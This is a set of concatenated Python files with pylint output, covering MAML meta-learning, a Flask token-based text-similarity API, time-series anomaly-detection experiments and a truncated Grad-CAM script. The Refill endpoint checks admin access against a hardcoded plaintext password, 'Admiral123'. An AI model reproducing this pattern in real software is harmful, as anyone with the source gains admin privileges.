23 self.train_xb = tf.placeholder(tf.float32, [None,None,None,None,self.image_shape[-1]])
24 self.train_yb = tf.placeholder(tf.float32, [None,None,None])
25 self.val_xb = tf.placeholder(tf.float32, [None,None,None,None,self.image_shape[-1]])
26 self.val_yb = tf.placeholder(tf.float32, [None,None,None])
27 self.label_n = tf.placeholder(tf.int32 , 1, name="num_labs")
28 #Initialize weights
29 self.weights, self.cells = self.dense_weights()
30 training = True if mode is 'train' else False
31
32 # Handle one task update
33 def meta_task(inputs):
34 train_x, train_y, val_x, val_y = inputs
35 val_preds, val_losses = [], []
36
37 train_pred = self.forward(train_x, self.weights, training)
38 train_loss = tf.losses.softmax_cross_entropy(train_y,train_pred)
39
40 grads = tf.gradients(train_loss, list(self.weights.values()))
41 gvs = dict(zip(self.weights.keys(), grads))
42
43 a=[self.weights[key] - self.train_lr * gvs[key] for key in self.weights.keys()]
44 # for key in self.weights.keys():
45 # print(key, gvs[key])
46 fast_weights = dict(zip(self.weights.keys(),a))
47
48 # Validation after each update
49 val_pred = self.forward(val_x, fast_weights, training)
50 val_loss = tf.losses.softmax_cross_entropy(val_y,val_pred)
51 # record T0 pred and loss for meta-test
52 val_preds.append(val_pred)
53 val_losses.append(val_loss)
54
55 # continue to build T1-TK steps graph
56 for _ in range(1, K):
57
58 # Update weights on train data of task t
59 loss = tf.losses.softmax_cross_entropy(train_y,self.forward(train_x, fast_weights, training))
60 grads = tf.gradients(loss, list(fast_weights.values()))
61 gvs = dict(zip(fast_weights.keys(), grads))
62 fast_weights = dict(zip(fast_weights.keys(), [fast_weights[key] - self.train_lr * gvs[key] for key in fast_weights.keys()]))
63
64 # Evaluate validation data of task t
65 val_pred = self.forward(val_x, fast_weights, training)
66 val_loss = tf.losses.softmax_cross_entropy(val_y,val_pred)
67 val_preds.append(val_pred)
68 val_losses.append(val_loss)
69
70 result = [train_pred, train_loss, val_preds, val_losses]
71
72 return result
73
74 out_dtype = [tf.float32, tf.float32,[tf.float32] * K, [tf.float32] * K]
75 result = tf.map_fn(meta_task, elems=(self.train_xb, self.train_yb, self.val_xb, self.val_yb),
76 dtype=out_dtype, parallel_iterations=meta_batchsz, name='map_fn')
77 train_pred_tasks, train_loss_tasks, val_preds_tasks, val_losses_tasks = result
78
79 if mode is 'train':
80 self.train_loss = train_loss = tf.reduce_sum(train_loss_tasks) / meta_batchsz
81 self.val_losses = val_losses = [tf.reduce_sum(val_losses_tasks[j]) / meta_batchsz for j in range(K)]
82 self.val_predictions = val_preds_tasks
83
84 optimizer = tf.train.AdamOptimizer(self.meta_lr, name='meta_optim')
85 gvs = optimizer.compute_gradients(self.val_losses[-1])
86 gvs = [(tf.clip_by_norm(grad, 10), var) for grad, var in gvs]
87 self.meta_op = optimizer.apply_gradients(gvs)
88
89 else:
90 self.test_train_loss = train_loss = tf.reduce_sum(train_loss_tasks) / meta_batchsz
91 self.test_val_losses = val_losses = [tf.reduce_sum(val_losses_tasks[j]) / meta_batchsz for j in range(K)]
92 self.val_predictions = val_preds_tasks
93
94 self.saving_weights = tf.trainable_variables()
95 def conv_layer(self, x, W, b, name, strides=1):
96 with tf.variable_scope(name,reuse=tf.AUTO_REUSE):
97 x = tf.nn.conv2d(x, W, strides=[1,1,1,1], padding='SAME')
98 x = tf.nn.bias_add(x, b)
99 return x
100
101 def fc_layer(self,x, name, weights=None, biases=None):
102 with tf.variable_scope(name,reuse=tf.AUTO_REUSE):
103 fc = tf.matmul(x, weights)
104 fc = tf.nn.bias_add(fc, biases)
105 return fc
106
107 def loadWeights(self, sess, name, step=0, modeldir='./model_checkpoint/', model_name='model.ckpt'):
108 if self.saver == None:
109 z = self.saving_weights
110 #print("KEYS:", z.keys())
111 self.saver = tf.train.Saver(var_list=z, max_to_keep=12)
112 saver = self.saver
113 checkpoint_path = modeldir + f"{name}/"+model_name +"-" + step
114 if os.path.isfile(checkpoint_path+".marker"):
115 saver.restore(sess, checkpoint_path)
116 print('The checkpoint has been loaded.')
117 else:
118 print(checkpoint_path+".marker not found. Starting from scratch.")
119
120 def saveWeights(self, sess, name, step=0, modeldir='./model_checkpoint/', model_name='model.ckpt'):
121 if self.saver == None:
122 z = self.saving_weights
123 self.saver = tf.train.Saver(var_list=z, max_to_keep=12)
124 saver = self.saver
125 checkpoint_path = modeldir + f"{name}/"+model_name
126 if not os.path.exists(modeldir):
127 os.makedirs(modeldir)
128 saver.save(sess, checkpoint_path, global_step=step)
129 print('The checkpoint has been created.')
130 open(checkpoint_path+"-"+str(int(step))+".marker", 'a').close()
131
132
133 def dense_weights(self):
134 return
135 def forward(self,x,weights, training):
136 return | 103 - warning: bad-indentation
104 - warning: bad-indentation
105 - warning: bad-indentation
8 - refactor: too-many-instance-attributes
9 - refactor: too-many-arguments
9 - refactor: too-many-positional-arguments
20 - refactor: too-many-locals
29 - error: assignment-from-none
29 - error: unpacking-non-sequence
30 - refactor: simplifiable-if-expression
30 - refactor: literal-comparison
33 - refactor: too-many-locals
37 - error: assignment-from-none
49 - error: assignment-from-none
65 - error: assignment-from-none
79 - refactor: literal-comparison
77 - warning: unused-variable
80 - warning: unused-variable
81 - warning: unused-variable
95 - refactor: too-many-arguments
95 - refactor: too-many-positional-arguments
95 - warning: unused-argument
107 - refactor: too-many-arguments
107 - refactor: too-many-positional-arguments
120 - refactor: too-many-arguments
120 - refactor: too-many-positional-arguments
130 - refactor: consider-using-with
130 - warning: unspecified-encoding
135 - warning: unused-argument
135 - warning: unused-argument
135 - warning: unused-argument
23 - warning: attribute-defined-outside-init
24 - warning: attribute-defined-outside-init
25 - warning: attribute-defined-outside-init
26 - warning: attribute-defined-outside-init
27 - warning: attribute-defined-outside-init
29 - warning: attribute-defined-outside-init
29 - warning: attribute-defined-outside-init
80 - warning: attribute-defined-outside-init
81 - warning: attribute-defined-outside-init
82 - warning: attribute-defined-outside-init
92 - warning: attribute-defined-outside-init
87 - warning: attribute-defined-outside-init
90 - warning: attribute-defined-outside-init
91 - warning: attribute-defined-outside-init
94 - warning: attribute-defined-outside-init
5 - warning: unused-import
|
1 import numpy as np
2 import tensorflow as tf
3 from data_gen.omni_gen import unison_shuffled_copies,OmniChar_Gen, MiniImgNet_Gen
4 import time
5
6 def train( m, mt, # m is the model foir training, mt is the model for testing
7 data_sampler, # Creates the data generator for training and testing
8 min_classes, # minimum amount of classes
9 max_classes, # maximum || || ||
10 train_shots, # number of samples per class (train)
11 test_shots, # number of samples per class (test)
12 meta_batch, # Number of tasks
13 meta_iters, # Number of iterations
14 test_iters, # Iterations in Test
15 train_step,
16 name): # Experiment name for experiments
17
18 sess = tf.Session()
19 sess.run(tf.global_variables_initializer())
20 # bnorms = [v for v in tf.global_variables() if "bn" in v.name]
21 #---------Performance Tracking lists---------------------------------------
22 losses = []
23 temp_yp = []
24 temp_ypn= []
25 nls = []
26 aps = []
27 buffer = []
28 lossesB = []
29 #--------------------------------------------------------------------------
30
31 #---------Load train and test data-sets------------------------------------
32 train_gen = data_sampler.sample_Task(meta_batch,min_classes,max_classes+1,train_shots,test_shots,"train")
33 if mt is not None:
34 test_gen = data_sampler.sample_Task(meta_batch,min_classes,max_classes+1,train_shots,test_shots,"test" )
35 m.loadWeights(sess, name, step=str(int(train_step)), model_name=name+".ckpt")
36 #--------------------------------------------------------------------------
37
38 #TRAIN LOOP
39 print("Starting meta training:")
40 start = time.time()
41 for i in range(meta_iters):
42
43 xb1,yb1,xb2,yb2 = next(train_gen)
44 num_l = [len(np.unique(np.argmax(yb1,axis=-1)))]
45
46 if m.maml_n == 2: # in case it uses hydra master node, it should re-assign the output nodes from the master
47 sess.run(m.init_assign, feed_dict={m.label_n:[5]})
48 l,_,vals,ps=sess.run([m.train_loss,m.meta_op,m.val_losses,m.val_predictions],feed_dict={m.train_xb: xb1,
49 m.train_yb: yb1,
50 m.val_xb:xb2,
51 m.val_yb:yb2,
52 m.label_n:num_l})
53 if m.maml_n == 2: # in case it uses hydra master node, it should update the master
54 sess.run(m.final_assign,feed_dict={m.label_n:num_l})
55
56 losses.append(vals)
57 lossesB.append(vals)
58 buffer.append(l)
59
60 #Calculate accuaracies
61 aux = []
62 tmp_pred = np.argmax(np.reshape(ps[-1],[-1,num_l[0]]),axis=-1)
63 tmp_true = np.argmax(np.reshape(yb2,[-1,num_l[0]]),axis=-1)
64 for ccci in range(num_l[0]):
65 tmp_idx = np.where(tmp_true==ccci)[0]
66 #print(tmp_idx)
67 aux.append(np.mean(tmp_pred[tmp_idx]==tmp_true[tmp_idx]))
68 temp_yp.append(np.mean(tmp_pred==tmp_true))
69 temp_ypn.append(aux)
70
71 #EVALUATE and PRINT
72 if i%100==0:
73 testString = ""
74 #If we give a test model, it will test using the weights from train
75 if mt is not None and i%1000==0:
76 lossestest = []
77 buffertest = []
78 lossesBtest = []
79 temp_yptest = []
80 for z in range(100):
81 if m.maml_n == 2:
82 sess.run(mt.init_assign, feed_dict={mt.label_n:[5]})
83 xb1,yb1,xb2,yb2 = next(test_gen)
84 num_l = [len(np.unique(np.argmax(yb1,axis=-1)))]
85 l,vals,ps=sess.run([mt.test_train_loss,mt.test_val_losses,mt.val_predictions],feed_dict={mt.train_xb: xb1,
86 mt.train_yb: yb1,
87 mt.val_xb:xb2,
88 mt.val_yb:yb2,
89 mt.label_n:num_l})
90 lossestest.append(vals)
91 lossesBtest.append(vals)
92 buffertest.append(l)
93 temp_yptest.append(np.mean(np.argmax(ps[-1],axis=-1)==np.argmax(yb2,axis=-1)))
94
95 testString = f"\n TEST: TLoss {np.mean(buffertest):.3f} VLoss {np.mean(lossesBtest,axis=0)[-1]:.3f}, ACCURACY {np.mean(temp_yptest):.4f}"
96 print(f"Epoch {i}: TLoss {np.mean(buffer):.4f}, VLoss {np.mean(lossesB,axis=0)[-1]:.4f},",
97 f"Accuracy {np.mean(temp_yp):.4}", f", Per label acc: {[float('%.4f' % elem) for elem in aux]}", f"Finished in {time.time()-start}s",testString)
98
99 buffer = []
100 lossesB = []
101 temp_yp = []
102 start = time.time()
103 # f"\n TRUE: {yb2}\n PRED: {ps}")
104 if i%5000==0:
105 print("Saving...")
106 m.saveWeights(sess, name, i, model_name=name+".ckpt")
107
108 m.saveWeights(sess, name, i, model_name=name+".ckpt")
| 6 - refactor: too-many-arguments
6 - refactor: too-many-positional-arguments
6 - refactor: too-many-locals
83 - error: possibly-used-before-assignment
6 - refactor: too-many-statements
14 - warning: unused-argument
25 - warning: unused-variable
26 - warning: unused-variable
80 - warning: unused-variable
3 - warning: unused-import
3 - warning: unused-import
3 - warning: unused-import
|
1 # ADAPTED BY Rafael Rego Drumond and Lukas Brinkmeyer
2 # THIS IMPLEMENTATION USES THE CODE FROM: https://github.com/dragen1860/MAML-TensorFlow
3
4 import numpy as np
5 import tensorflow as tf
6 from archs.maml2 import MAML
7 def getBin(l=10):
8 x_ = 2
9 n = 1
10 while x_ < l:
11 x_ = x_* 2
12 n += 1
13
14 numbers = []
15 for i in range(l):
16 num = []
17 for j in list('{0:0b}'.format(i+1).zfill(n)):
18 num.append(int(j))
19 numbers.append(num)
20 return numbers
21 class Model(MAML):
22 def __init__(self,train_lr,meta_lr,image_shape,isMIN, label_size=2):
23 super().__init__(train_lr,meta_lr,image_shape,isMIN, label_size)
24 self.finals = 64
25 if isMIN:
26 self.finals = 800
27 def getBin(self, l=10):
28 x_ = 2
29 n = 1
30 while x_ < l:
31 x_ = x_* 2
32 n += 1
33
34 numbers = []
35 for i in range(l):
36 num = []
37 for j in list('{0:0b}'.format(i+1).zfill(n)):
38 num.append(int(j))
39 numbers.append(num)
40 return numbers
41
42 def dense_weights(self):
43 weights = {}
44 cells = {}
45 initializer = tf.contrib.layers.xavier_initializer()
46 divider = 1
47 inic = 1
48 filters = 64
49 self.finals = 64
50 if self.isMIN:
51 print("\n\n\n\n\n\n\n\n\nIS MIN\n\n\n\n\n\n\n\n\n\n\n")
52 divider = 2
53 inic = 3
54 self.finals = 800
55 filters = 32
56 with tf.variable_scope('MASTER', reuse= tf.AUTO_REUSE):
57 cells['d_1'] = tf.get_variable('MASTER_d_1w', [self.finals,1], initializer = initializer)
58 cells['b_1'] = tf.get_variable('MASTER_d_1b', [1], initializer=tf.initializers.constant)
59 with tf.variable_scope('MAML', reuse= tf.AUTO_REUSE):
60 weights['c_1'] = tf.get_variable('c_1', shape=(3,3, inic,filters), initializer=initializer)
61 weights['c_2'] = tf.get_variable('c_2', shape=(3,3,filters,filters), initializer=initializer)
62 weights['c_3'] = tf.get_variable('c_3', shape=(3,3,filters,filters), initializer=initializer)
63 weights['c_4'] = tf.get_variable('c_4', shape=(3,3,filters,filters), initializer=initializer)
64 weights['cb_1'] = tf.get_variable('cb_1', shape=(filters), initializer=tf.initializers.constant)
65 weights['cb_2'] = tf.get_variable('cb_2', shape=(filters), initializer=tf.initializers.constant)
66 weights['cb_3'] = tf.get_variable('cb_3', shape=(filters), initializer=tf.initializers.constant)
67 weights['cb_4'] = tf.get_variable('cb_4', shape=(filters), initializer=tf.initializers.constant)
68 for i in range (self.max_labels):
69 weights['d_1w'+str(i)] = tf.get_variable('d_1w'+str(i), [self.finals,1], initializer = initializer)
70 weights['b_1w'+str(i)] = tf.get_variable('d_1b'+str(i), [1], initializer=tf.initializers.constant)
71
72
73 return weights, cells
74
75 def forward(self,x,weights, training):
76 # with tf.variable_scope('MAML', reuse= tf.AUTO_REUSE):
77 conv1 = self.conv_layer(x, weights["c_1"],weights["cb_1"],"conv1")
78 conv1 = tf.layers.batch_normalization(conv1, name="bn1", reuse=tf.AUTO_REUSE)
79 conv1 = tf.nn.relu(conv1)
80 conv1 = tf.layers.MaxPooling2D(2,2)(conv1)
81
82 conv2 = self.conv_layer(conv1,weights["c_2"],weights["cb_2"],"conv2")
83 conv2 = tf.layers.batch_normalization(conv2, name="bn2", reuse=tf.AUTO_REUSE)
84 conv2 = tf.nn.relu(conv2)
85 conv2 = tf.layers.MaxPooling2D(2,2)(conv2)
86
87 conv3 = self.conv_layer(conv2,weights["c_3"],weights["cb_3"],"conv3")
88 conv3 = tf.layers.batch_normalization(conv3, name="bn3", reuse=tf.AUTO_REUSE)
89 conv3 = tf.nn.relu(conv3)
90 conv3 = tf.layers.MaxPooling2D(2,2)(conv3)
91
92 conv4 = self.conv_layer(conv3,weights["c_4"],weights["cb_4"],"conv4")
93 conv4 = tf.layers.batch_normalization(conv4, name="bn4", reuse=tf.AUTO_REUSE)
94 conv4 = tf.nn.relu(conv4)
95 conv4 = tf.layers.MaxPooling2D(2,2)(conv4)
96
97 bn = tf.layers.Flatten()(conv4)
98
99 agg = [self.fc_layer(bn,"dense"+str(i),weights["d_1w"+str(i)],weights["b_1w"+str(i)]) for i in range(self.max_labels)]
100 fc1 = tf.concat(agg, axis=-1)[:,:self.label_n[0]]
101
102 return fc1 | 22 - refactor: too-many-arguments
22 - refactor: too-many-positional-arguments
46 - warning: unused-variable
75 - warning: unused-argument
4 - warning: unused-import
|
1 from Products.Archetypes.public import StringWidget
2 from Products.Archetypes.Registry import registerWidget
3
4 class ColorWidget(StringWidget):
5 _properties = StringWidget._properties.copy()
6 _properties.update({
7 'macro' : "colorchooser",
8 })
9
10
11 registerWidget(ColorWidget,
12 title='Color',
13 description='Like StringWidget, stores the hex value of a color.',
14 used_for=('Products.Archetypes.Field.StringField',)
15 )
16
17
18 from Products.validation import validation
19 from Products.validation.validators import RegexValidator
20 validation.register(RegexValidator('isHexColor', r'^[0-9a-fA-F]{6}$', title='', description='',
21 errmsg='is not a hexadecimal color code.'))
22
| 4 - refactor: too-few-public-methods
|
1 # importing libraries
2 from sys_utils import *
3
4 # Resource refill
5 """
6 Resource Refill takes input on a POST protocol and adds to the existing tokens
7 Parameters:
8 namepassref: contains username, admin password and refill amount <JSON>
9 Returns:
10 retJson: contains status code and message <JSON>
11 """
12 class Refill(Resource):
13 def post(self):
14 namepassref = request.get_json()
15 username = namepassref["username"]
16 admin_password = namepassref["admin_password"]
17 refill_amt = namepassref["refill_amt"]
18
19 if not userExists(username):
20 retJson = {
21 "statuscode" : 301,
22 "message" : "User does not exit"
23 }
24 return jsonify(retJson)
25
26 correct_admin_password = "Admiral123"
27
28 if not correct_admin_password == admin_password:
29 retJson = {
30 "statuscode" : 304,
31 "message" : "Invalid admin password"
32 }
33 return jsonify(retJson)
34
35 num_tokens = countTokens(username)
36
37 users.update({
38 "username":username,
39 },
40 {
41 "$set": {
42 "tokens" : num_tokens + refill_amt
43 }
44 }
45 )
46
47 retJson = {
48 "statuscode" : 200,
49 "message" : "Tokens refilled successfully"
50 }
51 return jsonify(retJson)
| 2 - warning: wildcard-import
5 - warning: pointless-string-statement
12 - error: undefined-variable
14 - error: undefined-variable
19 - error: undefined-variable
24 - error: undefined-variable
33 - error: undefined-variable
35 - error: undefined-variable
37 - error: undefined-variable
51 - error: undefined-variable
12 - refactor: too-few-public-methods
|
1 # importing libraries
2 from sys_utils import *
3
4 # Resource Detect
5 """
6 Resource Detect takes input on a POST protocol and returns similarity ratio
7 Parameters:
8 namepassimg: contains username, password of the user and two string documents <JSON>
9 Returns:
10 retJson: contains status code and message <JSON>
11 """
12 class Detect(Resource):
13 def post(self):
14 namepasstext = request.get_json()
15 username = namepasstext["username"]
16 password = namepasstext["password"]
17 text1 = namepasstext["text1"]
18 text2 = namepasstext["text2"]
19
20 if not userExists(username):
21 retJson = {
22 "statuscode" : 301,
23 "message" : "User does not exit"
24 }
25 return jsonify(retJson)
26
27 correct_pw = verifypw(username, password)
28 if not correct_pw:
29 retJson = {
30 "statuscode" : 302,
31 "message" : "Invalid password"
32 }
33 return jsonify(retJson)
34
35 num_tokens = countTokens(username)
36 if num_tokens <= 0 :
37 retJson = {
38 "statuscode" : 303,
39 "message" : "Out of tokens, please refill"
40 }
41 return jsonify(retJson)
42
43 # calculate edit distance. We use the pretained spacy model to predict the similarity of two strings goven to us
44 nlp = spacy.load('en_core_web_sm') # loaded the spacy model
45
46 text1 = nlp(text1) # change from string to natural language processing model sentence
47 text2 = nlp(text2)
48
49 # ratio of similarity between 0 and 1 for the text1 and text2. closer the one, more the similarity
50 # 0 = text1 and text2 are very different and 1 = text1 and text2 are almost or entirely similar
51
52 ratio = text1.similarity(text2)
53
54 retJson = {
55 "statuscode" : 200,
56 "message" : "Similarity ration calculated",
57 "similarity ratio" : ratio
58 }
59
60 users.update({
61 "username":username,
62 },
63 {
64 "$set": {
65 "tokens" : num_tokens -1
66 }
67 }
68 )
69 return jsonify(retJson)
| 2 - warning: wildcard-import
5 - warning: pointless-string-statement
12 - error: undefined-variable
14 - error: undefined-variable
20 - error: undefined-variable
25 - error: undefined-variable
27 - error: undefined-variable
33 - error: undefined-variable
35 - error: undefined-variable
41 - error: undefined-variable
44 - error: undefined-variable
60 - error: undefined-variable
69 - error: undefined-variable
12 - refactor: too-few-public-methods
|
1 # importing libraries
2 from sys_utils import *
3
4 # Resource Register
5 """
6 Resource Register takes input on a POST protocol and creates new accounts
7 Parameters:
8 namepass: contains username and password of the user <JSON>
9 Returns:
10 retJson: contains status code and message <JSON>
11 """
12 class Register(Resource):
13 def post(self):
14 namepass = request.get_json()
15 username = namepass["username"]
16 password = namepass["password"]
17
18 # check if the user already exists
19 if userExists(username):
20 retJson = {
21 "statuscode" : 301,
22 "message" : "User Already exists"
23 }
24 return jsonify(retJson)
25
26 hashedpw = bcrypt.hashpw(password.encode('utf8'), bcrypt.gensalt())
27 users.insert({
28 "username" : username,
29 "password" : hashedpw,
30 "tokens" : 6
31 })
32 retJson = {
33 "statuscode" : 200,
34 "message" : "you successfuly signed up for the api"
35 }
36 return jsonify(retJson)
| 2 - warning: wildcard-import
5 - warning: pointless-string-statement
12 - error: undefined-variable
14 - error: undefined-variable
19 - error: undefined-variable
24 - error: undefined-variable
26 - error: undefined-variable
26 - error: undefined-variable
27 - error: undefined-variable
36 - error: undefined-variable
12 - refactor: too-few-public-methods
|
1 import pandas as pd
2 import numpy as np
3 from mpl_toolkits.mplot3d import Axes3D
4 import matplotlib.pyplot as plt
5 from matplotlib import cm
6
7
8 def univariant(df, param, quantity='mean_test_score'):
9 unique = df[param].unique()
10 scores = []
11 for i in unique:
12 scores.append(df[df[param] == i][quantity].mean())
13
14 plt.plot(unique, scores)
15 plt.show()
16
17
18 def multivariant(df, param1, param2,quantity='mean_test_score'):
19 unique1 = df[param1].unique()
20 unique2 = df[param2].unique()
21 unique1, unique2 = np.meshgrid(unique1, unique2)
22 scores = np.zeros(unique1.shape)
23
24 for i, p1 in enumerate(unique1[0]):
25 for j, p2 in enumerate(unique2[0]):
26 scores[i, j] = df[(df[param1] == p1) & (df[param2] == p2)][quantity].values.mean()
27
28 fig = plt.figure()
29 ax = fig.gca(projection='3d')
30
31 surf = ax.plot_surface(unique1, unique2, scores, cmap=cm.coolwarm, linewidth=0, antialiased=False)
32 ax.set_xlabel(param1)
33 ax.set_ylabel(param2)
34 ax.set_zlabel("Accuracy")
35 plt.show()
36
37
38 df = pd.read_csv("..\\results\\cnn.csv")
39 univariant(df, param='param_cnn__len_filter',quantity='mean_score_time') | 8 - warning: redefined-outer-name
18 - warning: redefined-outer-name
31 - warning: unused-variable
3 - warning: unused-import
|
1 from alpaca import Alpaca
2 from utils import to_time_series_dataset, split_df, TimeSeriesResampler, confusion_matrix
3 from sklearn.model_selection import train_test_split
4 from sklearn.utils import shuffle
5 from sklearn.pipeline import Pipeline
6 import time
7 import numpy as np
8 import pandas as pd
9
10 # Variables
11 repetitions = 2
12
13 if __name__ == "__main__":
14
15 # For both datasets
16 for dataset in ['uc1']:
17 print("Dataset: ", dataset)
18
19 results = []
20 #timing = []
21 #outliers = []
22
23 if dataset == 'uc1':
24 X, y = split_df(pd.read_pickle('..\\data\\df_uc1.pkl'),
25 index_column='run_id',
26 feature_columns=['fldPosition', 'fldCurrent'],
27 target_name='target')
28 # Length of timeseries for resampler and cnn
29 sz = [38,41]
30 # Number of channels for cnn
31 num_channels = len(X[0][0])
32 # Number of classes for cnn
33 num_classes = np.unique(y).shape[0]
34
35 elif dataset == 'uc2':
36 X, y = split_df(pd.read_pickle('..\\data\\df_uc2.pkl'),
37 index_column='run_id',
38 feature_columns=['position', 'force'],
39 target_name='label')
40 # Length of timeseries for resampler and cnn
41 sz = [200]
42 # Number of channels for cnn
43 num_channels = len(X[0][0])
44 # Number of classes for cnn
45 num_classes = np.unique(y).shape[0]
46
47 # For each repetition
48 for r in range(repetitions):
49 print("Repetition #", r)
50 # For each resampling length
51 for s in sz:
52 print("Resampling size:", s)
53 t_start = time.time()
54 # Shuffle for Keras
55 X, y = shuffle(X, y, random_state=r)
56 # Turn y to numpy array
57 y = np.array(y)
58 # Split into train and test sets
59 X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, stratify=y, random_state=r)
60
61 alpaca = Pipeline([('resampler', TimeSeriesResampler(sz=s)),
62 ('classifier', Alpaca())])
63 alpaca.fit(X_train, y_train, classifier__stacked=False, classifier__n_clusters=200)
64
65 # Prediction
66 y_pred_bin, y_pred = alpaca.predict(X_test, voting="veto")
67 y_test_bin = np.copy(y_test)
68 y_test_bin[y_test_bin > 0] = 1
69
70 # BINARY RESULTS (AD + ENSEMBLE)
71 tn, fp, fn, tp = confusion_matrix(y_test_bin, y_pred_bin).ravel()
72 # Append overall error
73 results.append([s, r, 'err_bin', (fp + fn) / (tn + fp + fn + tp)])
74 # Append false negative rate
75 results.append([s, r, 'fnr_bin', fn / (fn + tp)])
76 # Append false positive rate
77 results.append([s, r, 'fpr_bin', fp / (fp + tn)])
78
79 # CLASSIFIER RESULTS
80 y_pred_clf = np.copy(y_pred)
81 y_pred_clf[y_pred_clf != 0] = 1 # Also turn classifier predictions to binary for cfm
82 tn, fp, fn, tp = confusion_matrix(y_test_bin, y_pred_clf).ravel()
83 # Append overall error
84 results.append([s, r, 'err_ens', (fp + fn) / (tn + fp + fn + tp)])
85 # Append false negative rate
86 results.append([s, r, 'fnr_ens', fn / (fn + tp)])
87 # Append false positive rate
88 results.append([s, r, 'fpr_ens', fp / (fp + tn)])
89 """
90 # TIMING
91 sample = np.transpose(to_time_series_dataset(X_test[0]), (2, 0, 1))
92 start = time.time()
93 for i in range(100):
94 alpaca.predict(sample, voting='veto')
95 end = time.time()
96 timing.append([(end - start) * 10, s]) # in ms
97
98
99 # SAVE OUTLIERS (with y_pred,y_pred_bin, y_true)
100 idx = np.where(y_test_bin != y_pred_bin)
101 # Flattened curves
102 for i in idx[0]:
103 outliers.append([X_test[i],
104 y_pred[i],
105 y_test[i],
106 y_pred_bin[i],
107 y_test_bin[i]])
108 """
109 t_end = time.time()
110 print("Substest finished, duration ",(t_end-t_start))
111
112 # SAVE ALL RESULTS PER DATASET
113 df = pd.DataFrame(results, columns=['resampling', 'test', 'metric', 'value'])
114 df.to_csv("..\\results\\Test"+dataset+".csv")
115 #df = pd.DataFrame(timing, columns=['time', 'resampling'])
116 #df.to_csv("..\\results\\Timing"+dataset+".csv")
117 #df = pd.DataFrame(outliers, columns=['sample', 'y_pred', 'y_test', 'y_pred_bin', 'y_test_bin'])
118 #df.to_pickle("..\\results\\Outliers"+dataset+".pkl")
119
120
121 #plot_confusion_matrix(y_test_bin.astype(int), y_pred_bin.astype(int), np.array(["0", "1"]), cmap=plt.cm.Blues)
122 #plt.show()
123 #plot_confusion_matrix(y_test.astype(int), y_pred.astype(int), np.array(["0", "1", "2", "3", "?"]), cmap=plt.cm.Greens)
124 #plt.show()
125
126
127
| 51 - error: possibly-used-before-assignment
89 - warning: pointless-string-statement
2 - warning: unused-import
|
1 from alpaca import Alpaca
2 from utils import to_time_series_dataset, to_dataset, split_df, TimeSeriesResampler
3 import time
4 import numpy as np
5 import pandas as pd
6 from sklearn.pipeline import Pipeline
7
8 max_sample = 20
9
10 for dataset in ['uc2']:
11 if dataset == 'uc1':
12 X, y = split_df(pd.read_pickle('..\\data\\df_uc1.pkl'),
13 index_column='run_id',
14 feature_columns=['fldPosition', 'fldCurrent'],
15 target_name='target')
16 y = np.array(y)
17 # Length of timeseries for resampler and cnn
18 sz = 38
19 # Number of channels for cnn
20 num_channels = len(X[0][0])
21 # Number of classes for cnn
22 num_classes = np.unique(y).shape[0]
23 if dataset == 'uc2':
24 X, y = split_df(pd.read_pickle('..\\data\\df_uc2.pkl'),
25 index_column='run_id',
26 feature_columns=['position', 'force'],
27 target_name='label')
28 y = np.array(y)
29 # Length of timeseries for resampler and cnn
30 sz = 200
31 # Number of channels for cnn
32 num_channels = len(X[0][0])
33 # Number of classes for cnn
34 num_classes = np.unique(y).shape[0]
35
36 resampler = TimeSeriesResampler(sz=sz)
37 alpaca = Pipeline([('resampler', resampler),
38 ('classifier', Alpaca())])
39 alpaca.fit(X, y, classifier__stacked=False, classifier__n_clusters=200)
40
41 # Measure time for single sample processing
42 t = []
43 for i in range(1, max_sample+1):
44 for j in range(10):
45 rand = np.random.randint(2000)
46 sample = np.transpose(to_time_series_dataset(X[rand]), (2, 0, 1))
47 start = time.process_time()
48 for k in range(100):
49 for l in range(i):
50 y_pred_bin, y_pred = alpaca.predict(sample, voting='veto')
51 end = time.process_time()
52 t.append([i, (end-start)/100, 'single'])
53
54 # Measure time for batch processing of multiple sample numbers
55 for i in range(1, max_sample+1):
56 for j in range(10):
57 rand = np.random.randint(2000)
58 if i == 1:
59 sample = np.transpose(to_time_series_dataset(X[rand]), (2, 0, 1))
60 else:
61 sample = to_dataset(X[rand:rand+i])
62
63 start = time.process_time()
64 for k in range(100):
65 y_pred_bin, y_pred = alpaca.predict(sample, voting='veto')
66 end = time.process_time()
67 t.append([i, (end-start)/100, 'batch'])
68
69 df = pd.DataFrame(t, columns=['Sample Number', 'Time', 'Type'])
70 df.to_csv("..\\results\\Time_"+dataset+".csv")
71
72
73
74
| 36 - error: possibly-used-before-assignment
|
1 import tensorflow.keras.backend as K
2 import tensorflow.keras
3 from tensorflow.keras.layers import Lambda
4 from tensorflow.keras.models import Model, load_model
5 tensorflow.compat.v1.disable_eager_execution()
6 import tensorflow as tf
7
8 import pandas as pd
9 import numpy as np
10 import matplotlib.pyplot as plt
11
12 from utils import to_time_series_dataset, split_df, load_test, TimeSeriesResampler, TimeSeriesScalerMeanVariance
13 from scipy.interpolate import interp1d
14
15 import seaborn as sns
16 sns.set(style='white',font='Palatino Linotype',font_scale=1,rc={'axes.grid' : False})
17
18
19 def get_model(id):
20 model = load_model('.\\models\\cam_cnn_'+id+'.h5')
21 return model
22
23
24 def target_category_loss(x, category_index, nb_classes):
25 return tf.multiply(x, K.one_hot([category_index], nb_classes))
26
27
28 def target_category_loss_output_shape(input_shape):
29 return input_shape
30
31
32 def normalize(x):
33 # utility function to normalize a tensor by its L2 norm
34 return x / (K.sqrt(K.mean(K.square(x))) + 1e-5)
35
36
37 def load_data(dataset):
38 if dataset == 'test':
39 X, y = load_test()
40 sz = 230
41 elif dataset == 'uc1':
42 X, y = split_df(pd.read_pickle('..\\data\\df_uc1.pkl'),
43 index_column='run_id',
44 feature_columns=['fldPosition', 'fldCurrent'],
45 target_name='target')
46 # Length of timeseries for resampler and cnn
47 sz = 38
48 elif dataset == 'uc2':
49 X, y = split_df(pd.read_pickle('..\\data\\df_uc2.pkl'),
50 index_column='run_id',
51 feature_columns=['position', 'force'],
52 target_name='label')
53 # Length of timeseries for resampler and cnn
54 sz = 200
55 resampler = TimeSeriesResampler(sz=sz)
56 X = resampler.fit_transform(X, y)
57 y = np.array(y)
58 return X, y
59
60
61 def get_sample(X, y, label, rs=100):
62 s = np.random.RandomState(rs)
63 s = s.choice(np.where(y == label)[0], 1)
64 x_raw = to_time_series_dataset(X[s, :, :])
65 scaler = TimeSeriesScalerMeanVariance(kind='constant')
66 X = scaler.fit_transform(X)
